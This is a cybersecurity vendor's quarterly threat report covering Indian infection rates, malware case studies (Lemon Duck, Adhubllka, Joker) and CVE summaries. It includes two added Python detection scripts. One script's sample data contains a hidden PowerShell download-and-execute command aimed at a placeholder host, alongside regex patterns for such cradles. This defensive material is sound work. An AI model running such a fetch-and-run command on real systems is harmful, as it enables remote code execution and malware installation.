
Cyber Threat Monitor Report, Q2 2021-22
www.k7computing.com

Contents

03. A Glimpse into the Cyber Threat World
    Cyber Threat Monitor India
05. Regional Infection Profile
    Infection Rate Comparison across Platforms
09. Enterprise Insecurity
    Case Study 1: Lemon Duck Miner Wreaking Havoc
    Case Study 2: Adhubllka Brute Forcing itself into Unsecured Devices
    Safety Recommendations
13. Vulnerabilities Galore
    RCE Vulnerability in Windows Printer Spooler
    Vulnerability in Kaseya VSA
    SonicWall Products Affected by Buffer Overflow Vulnerability
    Windows DNS Server RCE Vulnerability
    Critical Vulnerability in Microsoft's Trident Engine
    Privilege Escalation Vulnerabilities in HP and Samsung Printers
15. Danger in the Internet Of Things
    Vulnerabilities in NETGEAR Smart Switches
    Devices Exploitable by Zero-Click ForcedEntry
    Mitigation Techniques
18. Windows Under Siege
    Windows Malware Type Breakdown
    Windows Exploits
    Host Intrusion Prevention System Heuristics
    Mitigation Tips
21. The Mobile Device Story
    Case Study: No Joking Around with JOKER
    The Ubiquitous Trojan
    The Adware Impact
    Tips to Stay Safe
24. Mac Attack
    The Trojan Brouhaha
    The Adware Saga
    A Trickle of PUPs
    Safety Guidelines
27. Key Takeaways

K7 Cyber Threat Monitor

A Glimpse into the Cyber Threat World

Even after the continuous plunge in the number of recorded cases worldwide, the dreadful Covid-19 is not over yet. The glimpse of light at the end of the tunnel, so to speak, is the growing awareness among global citizens to combat the SARS-CoV-2 strain by getting vaccinated and following the prescribed safety protocols. We wish the same could happen among netizens concerning digital hygiene.

Despite several warnings and words of caution from cybersecurity solution providers, a significant part of the netizens are still casual about basic cyber hygiene practices. Unfortunately, similar ignorance is practised by innumerable SMEs, SOHOs and startups. Even worse, many of them still do not seem to understand the probable loss they could bear if a threat actor successfully victimised them. This can be seen from the fact that some of them still use dated systems, such as Windows 7 or Windows 8 powered computers, for industrial production. One of the primary reasons why they fail to shift to more secure versions is that some of their application software is supported only on these operating system versions and that software is yet to be updated. Unfortunately, both these software providers and their consumers misjudge the severity, and thus unknowingly invite malware attacks.

In the past three months, our researchers uncovered hundreds of thousands of thwarted attacks inside and outside the country. Interestingly, a significant part of these attacks were due to unpatched old vulnerabilities such as SMBV3.

In this era of unprecedented uncertainty, countering such risks requires a cooperative effort involving end-users and enterprises alike. That is perhaps the only way to strengthen the bond between the security providers and the consumers to manage risks effectively. It's time to take the first step towards this initiative.

Happy reading, stay safe and stay healthy! We would appreciate you sharing this report among your colleagues and friends to raise awareness of the prevalence of cyber threats, thus helping to make the digital world a safer place!

Cyber Threat Monitor India

[Map of India showing the Infection Rate by city; the figure itself is not recoverable from the transcription. City labels visible on the map: Patna, Lucknow, Chennai (42%), Port Blair (41%), Puducherry (46%), plus two unattached values of 45% and 42%. Legend bands: 40% - 45%, 35% - 39%, 30% - 34%. Map for illustrative purposes only. Not to scale.]

Regional Infection Profile

Over 30 years, K7 Computing has successfully safeguarded millions of clients globally from various cyber threats. The cyber threat monitor report offers a snapshot of the threats observed during each quarter.

To better understand the present condition of the domestic threat landscape, we have designed a concept called Infection Rate (IR). The idea is picturised as follows.

[Diagram: Infection Rate (IR) of an area. Elements shown: K7 Users at location XYZ; Blocked Threat Event Notification; K7 Ecosystem Threat Intelligence; Update Notification; Infection Rate at XYZ = 4/50 = 8%. That is, the IR of a location is the share of K7 users there that reported a blocked threat event: 4 out of 50 users gives 8% in the worked figure.]

The overall Pan-India IR in comparison with the previous quarter is given below:

- Q1 2021-22: 41%
- Q2 2021-22: 45%

The sustained, steady escalation of the infection rate around the country has been the norm for many years. This quarter was no exception either.

The threat type breakdown for the Windows OS across Metros and Tier-1 cities is as depicted below.

[Chart: The Metros and Tier-1 Cities - Infection Rate, with the Windows threat-type breakdown by protection layer: Behaviour Protection, Firewall Protection, Scan Engine Protection, Web Protection. Only scattered values survive the transcription (44%, 41%, 55%, 52%, 54%, 27%, 14%, 28%; city label: Pune).]

Tier-2 cities are also facing an increase in threats, as shown in the proportion of thwarted attacks.

[Chart: Top 15 Infection Rates in Tier-2 Cities, data in %; individual values are not recoverable from the transcription.]

Back to contents

Infection Rate Comparison across Platforms

In spite of the popularity of the Windows platform, Android-powered devices are rapidly becoming the primary choice among many users for regular activities. As more and more users prefer mobiles over desktops, we at K7 Labs have included a separate Android IR in this report, along with a comparison of the threat scenario between Windows and Android devices. Let's see what has been reported to our rich K7 Ecosystem Threat Intelligence (K7ETI) infrastructure.

Android OS, albeit with its own flaws, is projected to be more secure than Windows, as it has been designed that way from a security standpoint when compared with its desktop counterparts. For example, Google has stringent vetting procedures for apps uploaded to its Play Store, and it also ensures that non-Play Store apps are not typically executable by default, making the environment more controlled, which in turn makes the mobile experience more secure. The IR graph depicted below complements what has been mentioned earlier.

[Chart: Windows IR vs Android IR, data in %, for Chennai, Ahmedabad, Bengaluru, Delhi, Hyderabad, Kolkata, Mumbai and Pune. The surviving values place the Windows IR of each city in the low-to-mid 40s and the Android IR in the low teens or below.]

Though statistics alone aren't sufficient to explain the threat environment, they do give us the likely trends in which the threat environment is swaying. From the statistics, we can see that smart cities are definitely not smart enough to protect themselves from the threat actors. Threat actors play it safe to lure gullible victims. Work From Home, the usage of BYOD and the lack of employee cybersecurity training, especially during the pandemic, have added to the rise in attacks. Organizations should ensure safe cyber security practices and regular training on the latest cyber threats, for example the comprehensive Cyber Awareness training course delivered by our K7 Academy, to combat this.

The detailed threat scenario of this quarter is explained in the separate sections below.

Enterprise Insecurity

Irrespective of whether an organization is a large enterprise, an SME or a startup, there is no dearth of cyber security issues for them. To make their tradecraft more effective, threat actors embrace new techniques, including exploiting the latest vulnerabilities and manipulating leaked credentials, thereby continually transforming the threat landscape and leading us to an increasingly complex digital ecosystem.

We don't have to look far into the past to see how threat actors are propelling new attack methods. For example, in the second quarter of the financial year 2021-22, there were two significant incidents at our enterprise clients' premises, which are illustrated below.

Case Study 1: Lemon Duck Miner Wreaking Havoc

During a recent escalation, we came across a network with systems having multiple scheduled tasks. On further analysis, it was found that this was the "Lemon Duck" malware, which creates and executes malicious scheduled tasks and scripts. The infection chain is as illustrated below:

1. Adversaries trigger an email loaded with a malicious document (.doc/.docx), JavaScript (.js) or an archive file (.zip)
2. It then proceeds to download malware and infect other systems in the network
3. Employs PowerShell scripts kicked off by multiple scheduled tasks and manipulates WMI for further persistence
4. Installs a crypto miner on the infected devices
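The scheduled-task and WMI persistence in step 3 is something a defender can hunt for directly. The following is an added example, not K7's code or tooling: it flags scheduled tasks whose command line launches PowerShell with download, hidden-window, no-profile or encoded-command traits, and WMI event-subscription bindings whose consumer runs such a line. The CSV layout of `schtasks /query /fo csv /v`, the WMI export fields and every sample record are constructed for illustration.

```python
"""Hunt for the Lemon Duck-style persistence from the case study: scheduled
tasks that launch PowerShell with download, hidden-window or encoded-command
flags, and WMI permanent event subscriptions whose consumer runs such a line.

Assumptions (example code, not K7 tooling): scheduled tasks arrive as the CSV
written by `schtasks /query /fo csv /v` (columns "TaskName", "Task To Run"),
and WMI bindings as an operator's export of root\\subscription with the
fields Filter, ConsumerClass and CommandLine. All records below are
constructed samples."""
import csv
import io
import re

# Traits that benign scheduled tasks rarely combine with PowerShell.
SUSPICIOUS_PS_PATTERNS = [
    re.compile(r"-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", re.I),
    re.compile(r"-(?:w|win|windowstyle)\s*hidden", re.I),
    re.compile(r"-(?:nop|noprofile)\b", re.I),
    re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression", re.I),
    re.compile(r"https?://", re.I),
]


def score_command(cmdline):
    """Return the regex patterns matched by a PowerShell command line
    (empty list for anything that does not invoke powershell/pwsh)."""
    if not re.search(r"powershell(?:\.exe)?|pwsh", cmdline, re.I):
        return []
    return [p.pattern for p in SUSPICIOUS_PS_PATTERNS if p.search(cmdline)]


def flag_tasks(schtasks_csv, threshold=2):
    """Return (TaskName, matched patterns) for every task whose "Task To Run"
    matches at least `threshold` suspicious traits."""
    flagged = []
    for row in csv.DictReader(io.StringIO(schtasks_csv)):
        hits = score_command(row.get("Task To Run", ""))
        if len(hits) >= threshold:
            flagged.append((row["TaskName"], hits))
    return flagged


def flag_wmi_bindings(bindings):
    """Return the Filter names of bindings whose consumer executes a command
    line (CommandLineEventConsumer / ActiveScriptEventConsumer) matching any
    suspicious trait; log-writing consumers such as NTEventLogEventConsumer
    are ignored."""
    cmd_consumers = {"CommandLineEventConsumer", "ActiveScriptEventConsumer"}
    return [b["Filter"] for b in bindings
            if b.get("ConsumerClass") in cmd_consumers
            and score_command(b.get("CommandLine", ""))]


# Constructed sample: one built-in task, one Lemon Duck-like task, one benign script.
SAMPLE_SCHTASKS_CSV = r'''"HostName","TaskName","Task To Run","Schedule Type"
"WS01","\Microsoft\Windows\Defrag\ScheduledDefrag","%windir%\system32\defrag.exe -c -h -o -$","Weekly"
"WS01","\SysUpdateTask","powershell -w hidden -nop -c ""IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.jsp')""","Hourly"
"WS01","\NightlyBackup","powershell.exe -File C:\scripts\backup.ps1","Daily"
'''

# Constructed sample: the default SCM binding plus a hypothetical malicious one
# (the base64 blob is filler, not a real payload).
SAMPLE_WMI_BINDINGS = [
    {"Filter": "SCM Event Log Filter", "ConsumerClass": "NTEventLogEventConsumer", "CommandLine": ""},
    {"Filter": "SampleUpdater", "ConsumerClass": "CommandLineEventConsumer",
     "CommandLine": "powershell.exe -nop -w hidden -e QUFBQUFBQUFBQUFBQUFBQUFBQUFBQUFB"},
]

if __name__ == "__main__":
    for name, hits in flag_tasks(SAMPLE_SCHTASKS_CSV):
        print("suspicious task:", name, hits)
    print("suspicious WMI bindings:", flag_wmi_bindings(SAMPLE_WMI_BINDINGS))
```

A threshold of two traits keeps a plain `powershell -File backup.ps1` task out of the results while the hidden, no-profile, download-cradle combination is caught.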

Case Study 2: Adhubllka Brute Forcing itself into Unsecured Devices

In another noticeable instance, an enterprise network was infected. The ransomware encrypted only the files on one of the secondary partitions and left the system folders, installed software and the rest untouched.

Here is how the ransomware accomplished its mission:

01. Attackers brute forced via RDP onto the unprotected system and executed the ransomware
02. All the local files on the infected system and folders shared with it were encrypted
03. This resulted in multiple systems whose files and drives were shared with the infected system being encrypted, even without the ransomware actually running on those systems
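Step 01 leaves a recognisable trail in the Windows Security log before any file is encrypted. The following added example, not from the report, detects a burst of failed RDP logons from one address followed by a successful logon from the same address; the event field names mirror what an operator exports from Event IDs 4625 and 4624, while the threshold, time window and all sample events are constructed assumptions.

```python
"""Spot the pattern behind Case Study 2 in Windows Security log events: a
burst of failed logons over RDP from one address, followed by a successful
logon from that same address.

Assumptions (example code, not K7 tooling): each event is a dict carrying the
fields an operator would export from Event ID 4625 (failed logon) and 4624
(successful logon): TimeCreated, EventID, LogonType, IpAddress, TargetUserName.
RDP sessions log LogonType 10; with Network Level Authentication the failed
attempts are usually recorded as LogonType 3, so both are considered. The
threshold, window and all sample events are constructed."""
from collections import defaultdict, deque
from datetime import datetime, timedelta

RDP_LOGON_TYPES = {3, 10}


def detect_rdp_bruteforce(events, threshold=5, window=timedelta(minutes=10)):
    """Return alerts as (IpAddress, kind, TimeCreated) tuples, in time order.
    kind is "bruteforce" once `threshold` failures from one address fall
    inside `window`, and "bruteforce-then-success" when a 4624 from that
    address follows the burst."""
    recent = defaultdict(deque)  # ip -> timestamps of failures inside the window
    flagged = {}                 # ip -> time the brute-force alert was raised
    alerts = []
    for ev in sorted(events, key=lambda e: e["TimeCreated"]):
        if ev["LogonType"] not in RDP_LOGON_TYPES:
            continue
        ip, t = ev["IpAddress"], ev["TimeCreated"]
        if ev["EventID"] == 4625:
            q = recent[ip]
            q.append(t)
            while t - q[0] > window:       # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and ip not in flagged:
                flagged[ip] = t
                alerts.append((ip, "bruteforce", t))
        elif ev["EventID"] == 4624 and ip in flagged:
            alerts.append((ip, "bruteforce-then-success", t))
            del flagged[ip]                # start a fresh episode for this address
            recent[ip].clear()
    return alerts


def _at(hour, minute):
    return datetime(2021, 9, 1, hour, minute)


# Constructed sample: an admin mistyping once and then logging in, versus an
# external address trying six accounts 15 s apart and then getting in.
SAMPLE_EVENTS = [
    {"TimeCreated": _at(9, 0), "EventID": 4625, "LogonType": 10,
     "IpAddress": "10.0.0.5", "TargetUserName": "admin"},
    {"TimeCreated": _at(9, 1), "EventID": 4624, "LogonType": 10,
     "IpAddress": "10.0.0.5", "TargetUserName": "admin"},
] + [
    {"TimeCreated": _at(2, 0) + timedelta(seconds=15 * i), "EventID": 4625,
     "LogonType": 3, "IpAddress": "203.0.113.7", "TargetUserName": user}
    for i, user in enumerate(["administrator", "admin", "backup", "scan", "user1", "test"])
] + [
    {"TimeCreated": _at(2, 5), "EventID": 4624, "LogonType": 10,
     "IpAddress": "203.0.113.7", "TargetUserName": "backup"},
]

if __name__ == "__main__":
    for ip, kind, when in detect_rdp_bruteforce(SAMPLE_EVENTS):
        print(f"{when:%H:%M:%S} {ip} {kind}")
```

The "bruteforce-then-success" alert is the one to page on: it is the moment the recommendation below to restrict RDP to trusted addresses would have made the difference.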

Safety Recommendations

- Administrators should restrict RDP to known, trusted IPs and change its default port
- Keep all your devices, including your OS, updated and patched against the latest vulnerabilities
- ALL systems in the network should have a reputable enterprise security suite, such as K7 Endpoint Security, installed and kept updated

Back to contents

Vulnerabilities Galore

Software glitches, popularly known as vulnerabilities, are the most important highlight of any threat landscape. Vulnerabilities are like threat actor magnets, as they usually offer an initial foothold on the targeted devices. And once an adversary gains access, they can further exploit it by executing malicious payloads and/or propagating across the network.

The innumerable new and old vulnerabilities available in various software and hardware environments result in a burgeoning of daily attacks, most of which target enterprise software and hardware systems. Highlighting all these vulnerabilities individually is beyond the scope of this periodic report; however, we have handpicked the most pervasive ones we encountered in the last quarter and have given a brief on them in this section (in no particular order).

RCE Vulnerability in Windows Printer Spooler

CVE-2021-34527, aka "Printer Nightmare", is a remote code execution (RCE) vulnerability in the Windows Printer Spooler service. CVE-2021-36936 is another RCE vulnerability in the printer spooler service.

The vulnerable Windows versions are Windows 7, Windows 8.1, Windows 10, Windows Server 2008, 2008 R2, 2012, 2012 R2, 2016, 2019, 2004 and 20H2.

Users are advised to install the patch(es) issued by Microsoft for these vulnerabilities and to disable the printer spooler service if it is not needed.

Vulnerability in Kaseya VSA

Kaseya made global news in the last quarter due to a widespread ransomware attack as a result of CVE-2021-30116 in its Kaseya Virtual System/Server Administrator (VSA) servers, which allowed adversaries to control VSA and deploy ransomware in Kaseya's customer environment.

The vulnerable versions are the Kaseya VSA platforms before v9.5.7a.

Kaseya released a detection tool, the "Kaseya VSA detection tool", to check whether a system has been exploited through this zero-day vulnerability. Users are advised to patch their VSA systems.

Windows DNS Server RCE Vulnerability

CVE-2021-34494 is an RCE vulnerability in DNS affecting all Windows DNS servers from version 2008. This is a high-risk vulnerability, as it requires zero interaction from the user to achieve RCE.

Critical Vulnerability in Microsoft's Trident Engine

CVE-2021-40444 is an RCE vulnerability in the Windows MSHTML engine which could be exploited by attackers by tricking users into opening specially crafted Microsoft Office documents containing a malicious ActiveX control.

The vulnerable Windows versions are Windows 10, Windows Server 2019, Windows Server 2016, Windows 7, Windows 8.1, Windows Server 2008 and Windows Server 2012.

SonicWall Products Affected by Buffer Overflow Vulnerability

CVE-2021-20019 is a buffer overflow in HTTP request header handling that leads to a partial memory leak and causes DoS or arbitrary code execution. The vulnerability lies in the web page of VPN and product management products such as:

- NSa, TZ (GEN7): NSa, TZ 7.0.1-713 and older
- NSsp (GEN7): NSsp below 7.0.0.376
- NSv (Virtual: VMWare/Hyper-V/AWS/Azure/KVM): SonicOSv 6.5.4.4-44v-21-955 and older

Users are strictly advised to patch SonicOS at the earliest.

Back to contents

Danger in the Internet Of Things

In tandem with the surge in IoT device usage across enterprises and consumers alike, the devices themselves are brimming with flaws. The perpetual tide raises serious safety concerns around the IoT space.

Here are the most concerning vulnerabilities from the colossal list.

Privilege Escalation Vulnerabilities in HP and Samsung Printers

CVE-2021-3438 is a privilege escalation vulnerability due to a buffer overflow in printer software drivers installed on Windows. The vulnerability is caused by the improper implementation of code derived from Microsoft's Windows Driver Samples project, which contains insecure string copy functions, resulting in a buffer overflow.

Vulnerable devices are multiple HP LaserJet and Samsung printers (e.g. HP Color Laser 150 Series and Samsung CLP-360 Color Laser Printer series).

Vulnerabilities in NETGEAR Smart Switches

Demon's Cries is a vulnerability in the Netgear switches' sccd daemon, which implements the Netgear Switch Discovery Protocol (NSDP) on the switch. This vulnerability is a result of improper validation of the Type-Length-Value (TLV) fields in "Set" requests, which are used to update values on the device (such as setting the password) in the sccd daemon. An attacker can exploit this vulnerability to change the device's admin password without knowing the previous password.

Draconian Fear is a race condition type vulnerability in Netgear switches with which an unauthenticated user can take over an authenticated session by spoofing the administrator's IP.

The vulnerable devices are GC108P, GC108PP, GS108Tv3, GS110TPP, GS110TPv3, GS110TUP, GS308T, GS310TP, GS710TUP, GS716TP, GS716TPP, GS724TPP, GS724TPv2, GS728TPPv2, GS728TPv2, GS750E, GS752TPP, GS752TPv2, MS510TXM and MS510TXUP.

Devices Exploitable by Zero-Click ForcedEntry

CVE-2021-30860 is an integer overflow vulnerability in CoreGraphics which, on exploitation, leads to possible arbitrary code execution. An attacker can exploit this vulnerability by tricking users into opening specially crafted PDF files.

The vulnerable versions are iOS 14.8, iPadOS 14.8, macOS Big Sur 11.6 and watchOS 7.6.2.

Mitigation Techniques

- Continuously monitor all IoT devices on your network and keep track of their configurations
- Ensure all your devices are kept up to date and patched against the latest vulnerabilities

Back to contents

Windows Under Siege

By all accounts, this quarter too remained quite challenging for Windows users across the country. The threat actors were operating malware throughout the period by toughening their delivery mechanisms, triggering exploits and embracing various other obfuscation techniques. Let's look at what our telemetry reflected.

[Chart: Windows Malware Type Breakdown / Split of Windows Top 10 Detections, data in %; individual values are not recoverable from the transcription.]

Windows Exploits

Despite several warnings and streams of cyber security headlines, many Windows users still prefer to leave their OS and installed software unpatched, resulting in a slew of vulnerable systems in the wild. The available exploits, such as SMB or PowerShell related exploits, help the threat actors in gaining initial access to devices or escalating privileges to gain control of the victim's system.

[Chart: Most Prevalent Exploits, by IDS rule name, data in %, Q1 2021-22 vs Q2 2021-22. Rules shown: MS17-010 SMB TRANS2; MS17-010 eternalblue; MS17-010 SMB TRANS2 (CRYPTOWORM); SMBV3 Remote Code Execution; Executables download as image; MS17-010 Attack Detection; MS17-010 zzzexploit worawit H; Troj.Win32.IdleKMS.I; MS17-010 Powershell (ASCII); Lateral network worm DOC001.EXE; SMB Remcom Service.]

Host Intrusion Prevention System Heuristics

Our Host Intrusion Prevention System (HIPS) is a way of heuristically detecting threats based on their runtime behaviour. These heuristics are ideal for detecting new threats as well as newer variants of existing malware families. Let us see what our heuristic engine has detected in the last quarter.

[Chart: Windows Heuristic Detections, data in %. Categories: Susp dropper, Susp Reg Mod, Injector, Susp PowerShell Use, Susp CMD, Susp FilePath, IsErik Adware; individual values are not recoverable from the transcription.]

Malicious droppers occupied a significant chunk, followed by registry modifiers and code injectors. Our behavioural detection also identified malware that was hosted as malicious scripts on websites abusing PowerShell and the Windows command shell. A small percentage of the detections were of malware trying to evade detection by using suspicious file paths.

Mitigation Tips

- Keep your devices updated and patched against the latest vulnerabilities
- Follow the principle of least privilege while granting access to your employees
- Enforce a robust password policy

Back to contents

The Mobile Device Story

Malware attacks targeting Android users are increasing at a steep rate. Most of its threat landscape is taken up by Trojans when compared with Adware.

[Chart: Adware vs Trojan Proportional Split, Q1 2021-22 and Q2 2021-22; the pie-chart labels are not recoverable from the transcription.]

In the last quarter, we once again saw adversaries around the world unfold various tactics and techniques to accomplish their hostile intentions. The most popular mobile OS, Android, has endured large chunks of such attacks every day. For instance, Joker, the notorious Trojan, has spawned a barrage of attacks over this space.

Case Study: No Joking Around with JOKER

In the past few years, innumerable avatars of Joker popped onto the Google Play Store by adopting various tactics, such as modifying chunks of code or payload downloading techniques, to stay stealthy. Recently we found its strains on a series of apps on the Google Play Store. Looking into one such malicious app, we discerned some exciting patterns in it. The kill-chain of the latest version, which we observed recently, is as follows:

THE CAMOUFLAGE: Once launched, it retrieves the first-level payload from a hardcoded URL, enabling the parent malware with additional capabilities

THE SHEPHERD: The first payload has a base64 encoded malicious URL to download the second payload

AND THE STRIFE BEGINS: The second payload installed is the Joker malware, which attempts to intercept incoming SMS messages and subscribes to paid premium services

The Ubiquitous Trojan

Last quarter, many new Trojans were noticed in the Android threat landscape.

[Chart: Most Prevalent Trojan Types, data in %. Families labelled: Andr.Trj.Obfs, Andr.Trj.Lckr, Andr.Trj.HddApp, Others; individual values are not recoverable from the transcription.]

The Adware Impact

A detrimental bunch of adware bent on making quick and easy money remained omnipresent last quarter too. We noticed a plethora of adware, the majority of which belong to older families, existing on Google's official app store as well as on third-party app stores.

[Chart: Trend Line Showing the Adware Plague; family labels include Andr.Ad.VrtlAppPck; individual values are not recoverable from the transcription.]

Tips to Stay Safe

- Always be extra cautious when downloading and installing any app
- Do not download apps from unknown sources or third-party app stores
- Keep your OS and devices updated and patched against the latest vulnerabilities
- Install a robust security product like K7 Mobile Security to stay protected from the latest threats, and update it regularly

Back to contents

Mac Attack

From the different Trojans, coin miners and ransomware variants that we noticed last quarter, we can glean that threat actors are also increasingly targeting macOS. Though the proportion of PUPs in the macOS space has diminished considerably, threat actors are still not losing hope of raising their presence.

[Chart: Trojan, Adware & PUP Proportional Split, Q1 2021-22 vs Q2 2021-22, with categories Trojan, Adware and PUP/PUA; the pie-chart values are not recoverable from the transcription.]

The Trojan Brouhaha

Notorious Trojans, such as Adload and the EvilQuest ransomware, and some coin miners continue to pose a severe threat, contributing to more than three-fourths of the total Trojan attacks we thwarted this quarter.

[Chart: Trojan Detection Trend Lines. Labels: Adload, EvilQuest, CoinMiner, Agent, Exploits, Ransomware, Spyware, Trojan, Others; individual values are not recoverable from the transcription.]

The Adware Saga

In the macOS space, the proportion of adware noticed each quarter is not very significant. This could be attributed to the strict reviewing policy of Apple. Despite that, the Bundlore adware variant is still quite prevalent in the macOS space.

[Chart: The Trend Line of Adware Variant Detections. Labels: Bundlore, Pirrit, Synataeb, FireSearch, Genieo, MaxOfferDeal, Others; individual values are not recoverable from the transcription.]

A Trickle of PUPs

The PUPs tracked last quarter are far fewer in comparison to Trojans and adware. The most significant among them were Mackeeper and Fplayer.

[Chart: Most Prevalent PUP Types; labels other than "Others" are not recoverable from the transcription.]

Safety Guidelines

- Keep your macOS updated and patched against the latest vulnerabilities
- Ensure you scan all your applications, even if they are downloaded from the official App Store
- Install a reputable security product like K7 Antivirus for Mac and keep it updated to protect your device from the latest threats

Back to contents

Key Takeaways

The prolonged Covid-19 pandemic has taught us the necessity of remote and hybrid working schedules to keep things moving. The sudden transformation in operations also heightened security risks and challenges. Newly adopted technologies and work practices require that cybersecurity strategies be rewritten, mitigation strategies rethought, and policies stretched to be dynamic and adaptive.

Here is a quick list of tips to help you strategize your security policy for the coming days.

Enterprise

- Secure your devices by keeping them up-to-date, patched against the latest vulnerabilities, and protected by up-to-date, high-quality security software such as K7 Endpoint Security
- Neither open documents from unknown or suspicious sources, nor enable macros in documents received from such sources
- Keep your network up-to-date and patched against the latest vulnerabilities

Consumer

- Secure your device with a reputable security product such as K7 Total Security for Windows, K7 Antivirus for Mac and K7 Mobile Security (Android and iOS), and keep it up-to-date
- Read the app's user reviews carefully before downloading and installing it on your device
- Do not install apps from unknown sources and/or third-party app stores, nor change the device settings that protect against this

Back to contents

Copyright 2021 K7 Computing Private Limited, All Rights Reserved. This material has been compiled by K7 Labs. This work may not be sold, transferred, adapted, abridged, copied or reproduced in whole or in part in any manner or form or any media without the express prior written consent of authorised personnel of K7 Computing Private Limited. All product names and company names and logos mentioned herein are the trademarks or registered trademarks of their respective owners. Email us at m

Oct 2021
